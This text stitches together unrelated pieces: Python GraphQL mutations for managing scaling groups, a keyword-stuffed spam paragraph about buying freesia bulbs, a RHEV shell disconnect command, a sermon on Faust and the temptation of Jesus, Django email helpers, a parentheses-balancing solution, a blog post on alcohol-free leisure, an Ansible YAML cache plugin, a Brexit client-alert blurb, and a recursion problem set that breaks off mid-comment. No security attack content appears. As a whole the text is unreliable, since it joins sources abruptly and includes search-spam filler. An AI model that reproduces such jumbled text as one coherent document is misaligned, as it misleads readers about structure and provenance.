    The allowed set is the union of the groups granted to *domain_name*,
    to the (resolved) user *group*, and to *access_key*.
    """
    query = (
        sa.select([sgroups_for_domains])
        .where(sgroups_for_domains.c.domain == domain_name)
    )
    result = await db_conn.execute(query)
    from_domain = {row['scaling_group'] for row in result}
    # *group* may be either a group name or a UUID; resolve to an id first.
    group_id = await resolve_group_name_or_id(db_conn, domain_name, group)
    from_group: Set[str]
    if group_id is None:
        from_group = set()  # empty
    else:
        query = (
            sa.select([sgroups_for_groups])
            .where(
                (sgroups_for_groups.c.group == group_id)
            )
        )
        result = await db_conn.execute(query)
        from_group = {row['scaling_group'] for row in result}
    query = (sa.select([sgroups_for_keypairs])
             .where(sgroups_for_keypairs.c.access_key == access_key))
    result = await db_conn.execute(query)
    from_keypair = {row['scaling_group'] for row in result}
    sgroups = from_domain | from_group | from_keypair
    # Fetch the full rows for the union, keeping only active groups.
    query = (sa.select([scaling_groups])
             .where(
                 (scaling_groups.c.name.in_(sgroups)) &
                 (scaling_groups.c.is_active)
             ))
    result = await db_conn.execute(query)
    return [row for row in result]


# GraphQL object type mirroring a ``scaling_groups`` row.
# NOTE: class-level docs are kept in comments on purpose — graphene exposes
# ``__doc__`` as the GraphQL type description, so a docstring would change
# the public schema.
class ScalingGroup(graphene.ObjectType):
    name = graphene.String()
    description = graphene.String()
    is_active = graphene.Boolean()
    created_at = GQLDateTime()
    driver = graphene.String()
    driver_opts = graphene.JSONString()
    scheduler = graphene.String()
    scheduler_opts = graphene.JSONString()

    @classmethod
    def from_row(
        cls,
        ctx: GraphQueryContext,
        row: Row | None,
    ) -> ScalingGroup | None:
        """Convert a DB row into a ScalingGroup instance (None passes through)."""
        if row is None:
            return None
        return cls(
            name=row['name'],
            description=row['description'],
            is_active=row['is_active'],
            created_at=row['created_at'],
            driver=row['driver'],
            driver_opts=row['driver_opts'],
            scheduler=row['scheduler'],
            scheduler_opts=row['scheduler_opts'],
        )

    @classmethod
    async def load_all(
        cls,
        ctx: GraphQueryContext,
        *,
        is_active: bool | None = None,
    ) -> Sequence[ScalingGroup]:
        """Load every scaling group, optionally filtered by active status."""
        query = sa.select([scaling_groups]).select_from(scaling_groups)
        if is_active is not None:
            query = query.where(scaling_groups.c.is_active == is_active)
        async with ctx.db.begin_readonly() as conn:
            return [
                obj async for row in (await conn.stream(query))
                if (obj := cls.from_row(ctx, row)) is not None
            ]

    @classmethod
    async def load_by_domain(
        cls,
        ctx: GraphQueryContext,
        domain: str,
        *,
        is_active: bool | None = None,
    ) -> Sequence[ScalingGroup]:
        """Load the scaling groups associated with the given domain."""
        j = sa.join(
            scaling_groups, sgroups_for_domains,
            scaling_groups.c.name == sgroups_for_domains.c.scaling_group)
        query = (
            sa.select([scaling_groups])
            .select_from(j)
            .where(sgroups_for_domains.c.domain == domain)
        )
        if is_active is not None:
            query = query.where(scaling_groups.c.is_active == is_active)
        async with ctx.db.begin_readonly() as conn:
            return [
                obj async for row in (await conn.stream(query))
                if (obj := cls.from_row(ctx, row)) is not None
            ]

    @classmethod
    async def load_by_group(
        cls,
        ctx: GraphQueryContext,
        group: uuid.UUID,
        *,
        is_active: bool | None = None,
    ) -> Sequence[ScalingGroup]:
        """Load the scaling groups associated with the given user group."""
        j = sa.join(
            scaling_groups, sgroups_for_groups,
            scaling_groups.c.name == sgroups_for_groups.c.scaling_group
        )
        query = (
            sa.select([scaling_groups])
            .select_from(j)
            .where(sgroups_for_groups.c.group == group)
        )
        if is_active is not None:
            query = query.where(scaling_groups.c.is_active == is_active)
        async with ctx.db.begin_readonly() as conn:
            return [
                obj async for row in (await conn.stream(query))
                if (obj := cls.from_row(ctx, row)) is not None
            ]

    @classmethod
    async def load_by_keypair(
        cls,
        ctx: GraphQueryContext,
        access_key: str,
        *,
        is_active: bool | None = None,
    ) -> Sequence[ScalingGroup]:
        """Load the scaling groups associated with the given access key."""
        j = sa.join(
            scaling_groups, sgroups_for_keypairs,
            scaling_groups.c.name == sgroups_for_keypairs.c.scaling_group)
        query = (
            sa.select([scaling_groups])
            .select_from(j)
            .where(sgroups_for_keypairs.c.access_key == access_key)
        )
        if is_active is not None:
            query = query.where(scaling_groups.c.is_active == is_active)
        async with ctx.db.begin_readonly() as conn:
            return [
                obj async for row in (await conn.stream(query))
                if (obj := cls.from_row(ctx, row)) is not None
            ]

    @classmethod
    async def batch_load_by_name(
        cls,
        ctx: GraphQueryContext,
        names: Sequence[str],
    ) -> Sequence[ScalingGroup | None]:
        """Dataloader-style batch fetch by name; keeps result order of *names*."""
        query = (
            sa.select([scaling_groups])
            .select_from(scaling_groups)
            .where(scaling_groups.c.name.in_(names))
        )
        async with ctx.db.begin_readonly() as conn:
            return await batch_result(
                ctx, conn, query, cls,
                names, lambda row: row['name'],
            )


# Input payload for CreateScalingGroup.
class CreateScalingGroupInput(graphene.InputObjectType):
    description = graphene.String(required=False, default='')
    is_active = graphene.Boolean(required=False, default=True)
    driver = graphene.String(required=True)
    driver_opts = graphene.JSONString(required=False, default={})
    scheduler = graphene.String(required=True)
    scheduler_opts = graphene.JSONString(required=False, default={})


# Input payload for ModifyScalingGroup; all fields optional (partial update).
class ModifyScalingGroupInput(graphene.InputObjectType):
    description = graphene.String(required=False)
    is_active = graphene.Boolean(required=False)
    driver = graphene.String(required=False)
    driver_opts = graphene.JSONString(required=False)
    scheduler = graphene.String(required=False)
    scheduler_opts = graphene.JSONString(required=False)


# Superadmin-only mutation: insert a new scaling group row.
class CreateScalingGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        name = graphene.String(required=True)
        props = CreateScalingGroupInput(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()
    scaling_group = graphene.Field(lambda: ScalingGroup, required=False)

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        name: str,
        props: CreateScalingGroupInput,
    ) -> CreateScalingGroup:
        data = {
            'name': name,
            'description': props.description,
            'is_active': bool(props.is_active),
            'driver': props.driver,
            'driver_opts': props.driver_opts,
            'scheduler': props.scheduler,
            'scheduler_opts': props.scheduler_opts,
        }
        insert_query = (
            sa.insert(scaling_groups).values(data)
        )
        return await simple_db_mutate_returning_item(
            cls, info.context, insert_query, item_cls=ScalingGroup
        )


# Superadmin-only mutation: partial update of an existing scaling group.
class ModifyScalingGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        name = graphene.String(required=True)
        props = ModifyScalingGroupInput(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        name: str,
        props: ModifyScalingGroupInput,
    ) -> ModifyScalingGroup:
        data: Dict[str, Any] = {}
        # Only fields present in the input are copied into the UPDATE.
        set_if_set(props, data, 'description')
        set_if_set(props, data, 'is_active')
        set_if_set(props, data, 'driver')
        set_if_set(props, data, 'driver_opts')
        set_if_set(props, data, 'scheduler')
        set_if_set(props, data, 'scheduler_opts')
        update_query = (
            sa.update(scaling_groups)
            .values(data)
            .where(scaling_groups.c.name == name)
        )
        return await simple_db_mutate(cls, info.context, update_query)


# Superadmin-only mutation: delete a scaling group (associations cascade).
class DeleteScalingGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        name = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        name: str,
    ) -> DeleteScalingGroup:
        delete_query = (
            sa.delete(scaling_groups)
            .where(scaling_groups.c.name == name)
        )
        return await simple_db_mutate(cls, info.context, delete_query)


# Grant a scaling group to a domain.
class AssociateScalingGroupWithDomain(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        domain = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        domain: str,
    ) -> AssociateScalingGroupWithDomain:
        insert_query = (
            sa.insert(sgroups_for_domains)
            .values({
                'scaling_group': scaling_group,
                'domain': domain,
            })
        )
        return await simple_db_mutate(cls, info.context, insert_query)


# Revoke a single scaling-group grant from a domain.
class DisassociateScalingGroupWithDomain(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        domain = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        domain: str,
    ) -> DisassociateScalingGroupWithDomain:
        delete_query = (
            sa.delete(sgroups_for_domains)
            .where(
                (sgroups_for_domains.c.scaling_group == scaling_group) &
                (sgroups_for_domains.c.domain == domain)
            )
        )
        return await simple_db_mutate(cls, info.context, delete_query)


# Revoke every scaling-group grant from a domain.
# NOTE(review): not listed in ``__all__`` — confirm whether intentional.
class DisassociateAllScalingGroupsWithDomain(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        domain = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        domain: str,
    ) -> DisassociateAllScalingGroupsWithDomain:
        delete_query = (
            sa.delete(sgroups_for_domains)
            .where(sgroups_for_domains.c.domain == domain)
        )
        return await simple_db_mutate(cls, info.context, delete_query)


# Grant a scaling group to a user group.
class AssociateScalingGroupWithUserGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        user_group = graphene.UUID(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        user_group: uuid.UUID,
    ) -> AssociateScalingGroupWithUserGroup:
        insert_query = (
            sa.insert(sgroups_for_groups)
            .values({
                'scaling_group': scaling_group,
                'group': user_group,
            })
        )
        return await simple_db_mutate(cls, info.context, insert_query)


# Revoke a single scaling-group grant from a user group.
class DisassociateScalingGroupWithUserGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        user_group = graphene.UUID(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        user_group: uuid.UUID,
    ) -> DisassociateScalingGroupWithUserGroup:
        delete_query = (
            sa.delete(sgroups_for_groups)
            .where(
                (sgroups_for_groups.c.scaling_group == scaling_group) &
                (sgroups_for_groups.c.group == user_group)
            )
        )
        return await simple_db_mutate(cls, info.context, delete_query)


# Revoke every scaling-group grant from a user group.
# NOTE(review): not listed in ``__all__`` — confirm whether intentional.
class DisassociateAllScalingGroupsWithGroup(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        user_group = graphene.UUID(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        user_group: uuid.UUID,
    ) -> DisassociateAllScalingGroupsWithGroup:
        delete_query = (
            sa.delete(sgroups_for_groups)
            .where(sgroups_for_groups.c.group == user_group)
        )
        return await simple_db_mutate(cls, info.context, delete_query)


# Grant a scaling group to a keypair.
class AssociateScalingGroupWithKeyPair(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        access_key = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        access_key: str,
    ) -> AssociateScalingGroupWithKeyPair:
        insert_query = (
            sa.insert(sgroups_for_keypairs)
            .values({
                'scaling_group': scaling_group,
                'access_key': access_key,
            })
        )
        return await simple_db_mutate(cls, info.context, insert_query)


# Revoke a single scaling-group grant from a keypair.
class DisassociateScalingGroupWithKeyPair(graphene.Mutation):

    allowed_roles = (UserRole.SUPERADMIN,)

    class Arguments:
        scaling_group = graphene.String(required=True)
        access_key = graphene.String(required=True)

    ok = graphene.Boolean()
    msg = graphene.String()

    @classmethod
    async def mutate(
        cls,
        root,
        info: graphene.ResolveInfo,
        scaling_group: str,
        access_key: str,
    ) -> DisassociateScalingGroupWithKeyPair:
        delete_query = (
            sa.delete(sgroups_for_keypairs)
            .where(
                (sgroups_for_keypairs.c.scaling_group == scaling_group) &
                (sgroups_for_keypairs.c.access_key == access_key)
            )
        )
        return await simple_db_mutate(cls, info.context, delete_query)
where to buy freesia bulbs freesia double yellow where to buy freesia bulbs. where to buy freesia bulbs image titled care for a potted freesia after blooming step 5 where to buy freesia bulbs in australia. where to buy freesia bulbs freesias amazoncom freesia double flowering mix flower bulbs garden freesia double flowering mix flower bulbs. where to buy freesia bulbs freesia bloom shows zygomorphic position of the flowers on the stem where to buy freesia bulbs. where to buy freesia bulbs 10 white single freesia bulbs can you force freesia bulbs tips on forcing freesia bulbs indoors. where to buy freesia bulbs freesia white where to buy freesia bulbs in australia. where to buy freesia bulbs close up of corms c vossner simple steps to fabulous fragrance with freesia easy to grow bulbs freesia bloom shows zygomorphic position of the flowers on the stem. where to buy freesia bulbs double freesia mix pack of 20 are freesia bulbs annuals or perennials hunker are freesia bulbs annuals or perennials. where to buy freesia bulbs image titled grow freesias step 6 where to buy freesia bulbs. where to buy freesia bulbs 100pcsbag freesia gardenfreesia bulbs flower freesia bonsai flower bulbs flowers orchid freesia where to buy freesia bulbs. where to buy freesia bulbs 23425393mjpg where to buy freesia bulbs. where to buy freesia bulbs image titled grow freesias step 8 amazoncom perennial beautiful freesia orange flower bulb perennial beautiful freesia orange flower bulb indoor garden rare bonsai bulbs easy. where to buy freesia bulbs freesia white wonder duo collection where to buy freesia bulbs. where to buy freesia bulbs freesia single white where to buy freesia bulbs. where to buy freesia bulbs made recently where to buy freesia bulbs. where to buy freesia bulbs freesia container care how to grow freesia bulbs in pots where to buy freesia bulbs. where to buy freesia bulbs hot pink freesia flowers where to buy freesia bulbs in australia. 
where to buy freesia bulbs freesias beautiful fragrant but not easy to grow in most areas where to buy freesia bulbs. where to buy freesia bulbs true yellow freesia bulbs indoor potted flowers orchidsbonsaifloral quiet home garden where to buy freesia bulbs. where to buy freesia bulbs organic fressia at the farmers market where to buy freesia bulbs in australia. where to buy freesia bulbs freesia single white 15 bulbs 6 cm fragrant ships from easy to where to buy freesia bulbs in australia. where to buy freesia bulbs 10 heirloom antique freesias bulbs very fragrant and easy to grow where to buy freesia bulbs in australia. where to buy freesia bulbs where to buy freesia bulbs. where to buy freesia bulbs true freesia bulbsflower freesiabonsai flower bulbs indoor pot flowers orchids freesia rhizome diy home garden plant 2 bulbs in bonsai from home garden where to buy freesia bulbs in australia.
#
# This file is part of python-rhev. python-rhev is free software that is
# made available under the MIT license. Consult the file "LICENSE" that
# is distributed together with this file for the exact licensing terms.
#
# python-rhev is copyright (c) 2010-2011 by the python-rhev authors. See
# the file "AUTHORS" for a complete overview.

from rhev import Connection, Error as RhevError
from rhevsh.command.command import RhevCommand


class DisconnectCommand(RhevCommand):
    """Shell command that tears down the active RHEV manager connection."""

    name = 'disconnect'
    description = 'disconnect from RHEV manager'
    helptext = """\
== Usage ==

disconnect

== Description ==

Disconnect an active connection to RHEV manager, if any. This method can
be called multiple times. It is not an error to disconnect when not
connected.
"""

    def execute(self):
        """Close the current connection, if any; safe to call repeatedly."""
        stdout = self.context.terminal.stdout
        connection = self.context.connection
        if connection is None:
            stdout.write('not connected\n')
            return
        try:
            connection.close()
        # Fixed: was Python-2-only ``except RhevError, e:`` with an unused
        # binding; the modern form is valid on both Python 2 and 3.
        except RhevError:
            # Best-effort close: a failure here still leaves us logically
            # disconnected, so the error is deliberately ignored.
            pass
        stdout.write('disconnected from RHEV manager\n')
        self.context.connection = None
One of the greatest works in the history of German literature is the play Faust, written by Johann Wolfgang Goethe. Goethe worked on this play on and off for 56 years. He started writing it as a young man of 27 years old, and did not finish it until just before he died in 1832 at the age of 83. It is a long and complex work, getting into deep discussions of science, religion, psychology, philosophy, history, and more. It is not easy reading. But the play’s setting for all those deep discussions is a simple and thought-provoking old German legend about a man who was tempted. The story begins with a conversation in heaven between God and the devil, much like in the story of Job. The devil makes a wager with God, betting that he can steal away from God the soul of a good man, a brilliant scientist named Dr. Faust. Determined to win the bet, the devil goes to work on Dr. Faust. The devil knows what Faust loves, what he wants in life, and what his frustrations are. After a lengthy discussion of all this, the devil makes his move. The devil offers to serve Faust, giving him everything he wants for his entire life, on the condition that when Faust’s life is over the devil may have his soul in hell for all eternity. Dr. Faust, desperate to have everything he wants, and to achieve all his goals, agrees to the offer. After all, he was just a young man, and old age and death were a long ways off. After fasting forty days and forty nights, Jesus was hungry. The tempter came to him and said, “If you are the Son of God, tell these stones to become bread.” Jesus answered, “It is written: ‘Man shall not live on bread alone, but on every word that comes from the mouth of God.’” Then the devil took him to the holy city and had him stand on the highest point of the temple. “If you are the Son of God,” he said, “throw yourself down. 
For it is written: ‘He will command his angels concerning you, and they will lift you up in their hands, so that you will not strike your foot against a stone.’” Jesus answered him, “It is also written: ‘Do not put the Lord your God to the test.’” Again, the devil took him to a very high mountain and showed him all the kingdoms of the world and their splendor. “All this I will give you,” he said, “if you will bow down and worship me.” Jesus said to him, “Away from me, Satan! For it is written: ‘Worship the Lord your God, and serve him only.’” Then the devil left him, and angels came and attended him. In the second temptation, you need to imagine the human side of Jesus. Jesus is just beginning his ministry and might be wondering about this call by heavenly Father into this work. The devil told Jesus to jump off the temple and let the angels take care of him. It is as if the devil were saying, “Maybe you ought give this religion business a little test. Go ahead and jump, and make sure that God will be taking care of you.” Again Jesus refused, saying “Do not put the Lord your God to the test.” As with Faust, there is a test going on here. But the human Jesus knows that he is the one being tested, and it is not for him to decide to switch roles and start testing God the Father. Then came the biggest temptation of all. Jesus was here to save the world, and the devil offered Jesus all the kingdoms of the world, if only Jesus would fall down and worship him; or, sell his soul, just like what was offered to Dr. Faust. Again Jesus refused, saying that the Lord God alone should be worshiped and served. The devil then left Jesus. Goethe made this clear in his play when Dr. Faust was nearing the end of his life. Life has indeed been full and good. The devil has fulfilled his promise and given Faust everything. But now, life will soon be over and Faust had long ago signed away his eternal hope, and he is in deep despair. The deal he made as a young man was a bad one. 
Lord God, our strength, the battle of good and evil rages within and around us, and our ancient foe tempts us with his deceits and empty promises. Keep us steadfast in your Word, and, when we fall, raise us again, and restore us through your Son, Jesus Christ, in whose name we pray. Amen.
# -*- coding: utf-8 -*-

from django.utils.translation import gettext as _
from django.template.loader import render_to_string

from djconfig import config

from spirit.core.utils import site_url
from spirit.core import tasks
from .tokens import (
    UserActivationTokenGenerator,
    UserEmailChangeTokenGenerator)


# XXX remove; use tasks for everything
def sender(request, subject, template_name, context, to):
    """Render *template_name* with *context* and queue the email to *to*.

    *request* is currently unused but kept for call-site compatibility.
    """
    context['site'] = site_url()
    context['site_name'] = config.site_name
    body = render_to_string(template_name, context)
    # Subject cannot contain new lines
    flat_subject = ''.join(subject.splitlines())
    tasks.send_email(flat_subject, body, to)


def send_activation_email(request, user):
    """Send the account-activation email to *user*."""
    subject = _("User activation")
    token = UserActivationTokenGenerator().generate(user)
    sender(
        request,
        subject,
        'spirit/user/activation_email.html',
        {'user_id': user.pk, 'token': token},
        [user.email],
    )


def send_email_change_email(request, user, new_email):
    """Send the email-change confirmation to the user's current address."""
    subject = _("Email change")
    token = UserEmailChangeTokenGenerator().generate(user, new_email)
    sender(
        request,
        subject,
        'spirit/user/email_change_email.html',
        {'token': token},
        [user.email],
    )
Volunteering is the giving of unpaid help and a commitment of time and energy by individuals for the benefit of society, the community or the environment. We support and promote all types of volunteering and hold our annual Cheering Volunteering awards celebration event for all of our volunteers in Central Bedfordshire every year. How do I get involved in formal volunteering? Community Voluntary Service (CVS) (link opens in new window) and Community Action Bedfordshire (link opens in new window) run volunteer centre services in Central Bedfordshire. They work with individuals and organisations to promote and develop volunteering so people are inspired to volunteer, have the opportunity to do so, and have excellent volunteering experiences. Voluntary Works (link opens in new window) is a consortium of local voluntary and community sector (VCS) organisations working to promote and support the sector in Central Bedfordshire. We recognise the value of volunteering and the benefits volunteers bring to people’s quality of life. We also recognise the contribution volunteers make to the economic, environmental and social life of the area. A Volunteering Strategy (PDF 587.1KB) is essential to ensure that people willing to volunteer do so in a nurturing and supportive environment. The Volunteering Strategy promotes volunteering, social action and communities doing more for themselves. In Central Bedfordshire volunteers of all ages add great value to the delivery of many local services (delivered by the public, voluntary and community sectors), which many vulnerable people are dependent upon. The Volunteering Strategy gives direction to supporting the demand for and supply of volunteers in areas such as health, social care, the environment, sport, the arts, education and learning, provision of information and advice services, housing, youth work, community development, community transport and many others. 
We have prepared a Volunteering Portfolio (PDF 523.8KB) to collate information about how we are supporting and encouraging volunteering.
class Solution:
    def minRemoveToMakeValidV1(self, s: str) -> str:
        """Remove the minimum number of parentheses so *s* is valid.

        Strategy: record the indices of every parenthesis that manages to
        pair up, then keep only those parentheses (plus every
        non-parenthesis character).
        """
        keep = set()
        opens = []
        for idx, ch in enumerate(s):
            if ch == "(":
                opens.append(idx)
            elif ch == ")" and opens:
                # This ')' closes the most recent unmatched '(' --
                # both indices survive.
                keep.add(opens.pop())
                keep.add(idx)
        pieces = []
        for idx, ch in enumerate(s):
            if ch not in "()" or idx in keep:
                pieces.append(ch)
        return "".join(pieces)

    def minRemoveToMakeValidV2(self, s: str) -> str:
        """Same result as V1, but tracks indices to *delete* instead.

        Unmatched ')' are recorded as they appear; any '(' still pending
        at the end of the scan is also unmatched and must go.
        """
        drop = set()
        pending = []
        for idx, ch in enumerate(s):
            if ch == "(":
                pending.append(idx)
            elif ch == ")":
                if pending:
                    pending.pop()
                else:
                    drop.add(idx)
        drop.update(pending)
        return "".join(ch for idx, ch in enumerate(s) if idx not in drop)


# TESTS
for text, expected in [
    ("lee(t(c)o)de)", "lee(t(c)o)de"),
    ("a)b(c)d", "ab(c)d"),
    ("))((", ""),
    ("(a(b(c)d)", "a(b(c)d)"),
]:
    solver = Solution()
    result = solver.minRemoveToMakeValidV1(text)
    print(f"Minimum Remove to Make '{text}' Valid Parentheses -> {result}")
    assert result == expected
    assert expected == solver.minRemoveToMakeValidV2(text)
Home » Culture » Scotch on the Rocks. Hold the Scotch. Scotch on the Rocks. Hold the Scotch. It’s not Christmas without mulled wine, not summer without Pimms, not New Year’s without champagne and not a party without copious amounts of not-quite-remembering what happened. As I scroll down my Facebook newsfeed, sitting alone at 2.38am – I really do know how to party – I see “Jager O’clock” (I improved the grammar) and I remember seeing, “wow, the bar is PACKED! LET’S PARTY!”, on Christmas Day. The realisation dawns on me that we, the people of a highly privileged modern society who have it all, have made alcohol synonymous with “fun”. Ignoring the horribly untraditional activity of going to a club on Christmas Day or the lack of memory indicating that a night out must have been a good one, the most prominent issue here is that, as a nation, we need to loosen up. Alcohol being a prerequisite to de-stiffening that British upper lip only serves to make obvious the fact that, truly, we don’t know how to have fun – at least not without removing all capacity to care. Or do we? As someone who has chosen not to periodically wake up with a headache, I’ve managed to live a very fulfilling and fun life without the aid of alcohol to get me laughing. I can write this all down too, because I have the added bonus of remembering what I did. Here is my list of alcohol-free activities for when having a drink just doesn’t tickle your fancy. A fairly obvious start, but let’s not lie, the cinema is a fool-proof fun time. You can laugh, cry, scream or rant for hours about how you could have done a better job. Even the smell of cinema popcorn makes me happy. And, if you’re lucky enough to belong to a well-known fruit-coloured network provider, or have friends that do, you can go every week for less than £5 unless your local cinema is the West End Vue in London’s Leicester Square, in which case don’t expect to pay less than £600 for a ticket. 
As a child who almost worshipped my favourite pop group (it was always an S Club party), the possibility of getting tickets to see them perform seemed like a once in a life time event. Thankfully, having entered adulthood and learnt that these pop groups were compiled of mere humans, I’ve become aware of the accessibility of music gigs. With tickets for small acoustic sets by up-and-coming artists starting at as little as £10, it’s a perfect way to spend a night with friends listening to great live music. Venues such as Notting Hill’s Tabernacle, St Pancras Old Church and the 02 Academies are constantly featuring artists new and old for those who like a smaller, more intimate gig. This may not seem an obvious source of a good time on paper and it does inherently involve a little bit of hard work, but a group of happy, like-minded people coming together to help those who need it can do nothing but good for the soul. Charity work, feeding the homeless, youth work – you’ll catch the bug and once you pop, you can’t stop! I’ve made some of my closest friends through volunteering and, as human beings; we all have an altruistic streak which means that doing something nice for someone else makes us feel really good. If this is the season for anything in London, it is the season to ice skate. Almost every landmark has had an ice rink stuck in front of it. What better way of soaking up the wintry goodness? The Tower Bridge ice rink may have been on the verge of becoming a swimming pool this year, but the Christmas magic was still alive – and watching people fall into the puddles that were drowning the ice was much funnier to see than the skating itself! Board games don’t only belong to Christmas: they belong everywhere, all the time. They are amazing and the man who devised the concept deserves a medal. These games bring together not only friends, but generations. 
Alliances formed, friendships challenged, marriages threatened – board games put us through our paces with absolutely no hope of reward at the end. The Monopoly money is fake and the poker chips aren’t worth a thing, but the hours of laughter and shouting most definitely leave you smiling, (unless you just saw a game of Monopoly through to the end, in which case you’re probably struggling to walk). Having discovered ‘Articulate’ this year, I asked my friend if she had heard of it, to which she replied: “Oh yes, that game that breaks up marriages?” Such fun! Good food, good company. The golden ratio. Boy, girl, man, woman or child – the way to all of our hearts is through our stomachs. What could be better than eating food made by someone who can chop onions at the speed of light and then have someone else wash the plates? The drinks can stay at the bar because I’d rather eat 500 calories of chocolate cake than get fat drinking wine. There’s a reason why eating together has never gone out of fashion; it’s in our nature. Let’s raise our glasses (of coke) to good food, good friends and great memories. This very short list is, of course, not exhaustive. Trips to the theatre, museums, sight-seeing, hiking, playing sports and, of course, shopping. All of these things can be enjoyed with or without alcohol but, I think, there remains an underlying fundamental notion that if you can’t loosen up without a drink around friends, then when can you? If you need a stiff drink to laugh with them, maybe you just need new friends. Or to chill out. Shireen Hilmi is the Health Editor at The Platform. She is currently working as a dentist in London, while undertaking her second degree in Medicine.
# (c) 2017, Brian Coca # (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = ''' cache: yaml short_description: YAML formatted files. description: - This cache uses YAML formatted, per host, files saved to the filesystem. version_added: "2.3" author: Brian Coca (@bcoca) options: _uri: required: True description: - Path in which the cache plugin will save the files type: list env: - name: ANSIBLE_CACHE_PLUGIN_CONNECTION ini: - key: fact_caching_connection section: defaults _prefix: description: User defined prefix to use when creating the files env: - name: ANSIBLE_CACHE_PLUGIN_PREFIX ini: - key: fact_caching_prefix section: defaults _timeout: default: 86400 description: Expiration timeout for the cache plugin data env: - name: ANSIBLE_CACHE_PLUGIN_TIMEOUT ini: - key: fact_caching_timeout section: defaults type: integer ''' import codecs import yaml from ansible.parsing.yaml.loader import AnsibleLoader from ansible.parsing.yaml.dumper import AnsibleDumper from ansible.plugins.cache import BaseFileCacheModule class CacheModule(BaseFileCacheModule): """ A caching module backed by yaml files. """ def _load(self, filepath): with codecs.open(filepath, 'r', encoding='utf-8') as f: return AnsibleLoader(f).get_single_data() def _dump(self, value, filepath): with codecs.open(filepath, 'w', encoding='utf-8') as f: yaml.dump(value, f, Dumper=AnsibleDumper, default_flow_style=False)
On 23 June 2016 UK voters will decide whether the UK remains within the European Union. The decision is, of course, significant to each citizen of the UK but it is also of paramount importance to the financial services industry. This client alert analyses what a decision to remain in the EU would mean to the financial services industry given the new UK settlement achieved by the Prime Minister and set out in the European Council Conclusions of 18 and 19 February 2016. It also analyses what a decision to leave the EU could mean for the sector.
# 6.00x Problem Set 5
#
# Part 2 - RECURSION

# print_function makes the module-level demo calls below behave identically
# under Python 2 and Python 3 (including the blank-line `print()` calls).
from __future__ import print_function

#
# Problem 3: Recursive String Reversal
#
def reverseString(aStr):
    """
    Given a string, recursively returns a reversed copy of the string.
    For example, if the string is 'abc', the function returns 'cba'.
    The only string operations used are indexing, slicing, and
    concatenation.

    aStr: a string
    returns: a reversed string
    """
    # Base case: the empty string and a single character reverse to
    # themselves.
    if len(aStr) <= 1:
        return aStr
    # Recursive case: last character first, then the reversal of the rest.
    return aStr[-1] + reverseString(aStr[:-1])

print(reverseString('abc'))

#
# Problem 4: X-ian
#
def x_ian(x, word):
    """
    Given a string x, returns True if all the letters in x are contained
    in word in the same order as they appear in x.

    >>> x_ian('eric', 'meritocracy')
    True
    >>> x_ian('eric', 'cerium')
    False
    >>> x_ian('john', 'mahjong')
    False

    x: a string
    word: a string
    returns: True if word is x_ian, False otherwise
    """
    # An empty x is trivially contained (in order) in any word.
    if len(x) == 0:
        return True
    if x[0] in word:
        # Consume the first matched occurrence and search only to its
        # right; this is what enforces the "same order" requirement.
        return x_ian(x[1:], word[word.find(x[0]) + 1:])
    return False

print(x_ian('eric', 'meritocracy'))
print(x_ian('eric', 'cerium'))
print(x_ian('sarina', 'czarina'))
print(x_ian('alvin', 'palavering'))
print(x_ian('john', 'mahjong'))
print(x_ian('eric', 'algebraic'))

#
# Problem 5: Typewriter
#
def insertNewlines(text, lineLength):
    """
    Given text and a desired line length, wrap the text as a typewriter
    would. Insert a newline character ("\n") after each word that reaches
    or exceeds the desired line length.

    text: a string containing the text to wrap.
    lineLength: the number of characters to include on a line before
        wrapping the next word.
    returns: a string, with newline characters inserted appropriately.
    """
    # Base case: the remaining text fits on one line.  Using <= here
    # (the original used <) fixes an IndexError when len(text) equals
    # lineLength exactly, because text[lineLength] would then be out of
    # range below.
    if len(text) <= lineLength:
        return text
    if text[lineLength] == ' ':
        # The wrap point lands exactly on a space: keep it (and the
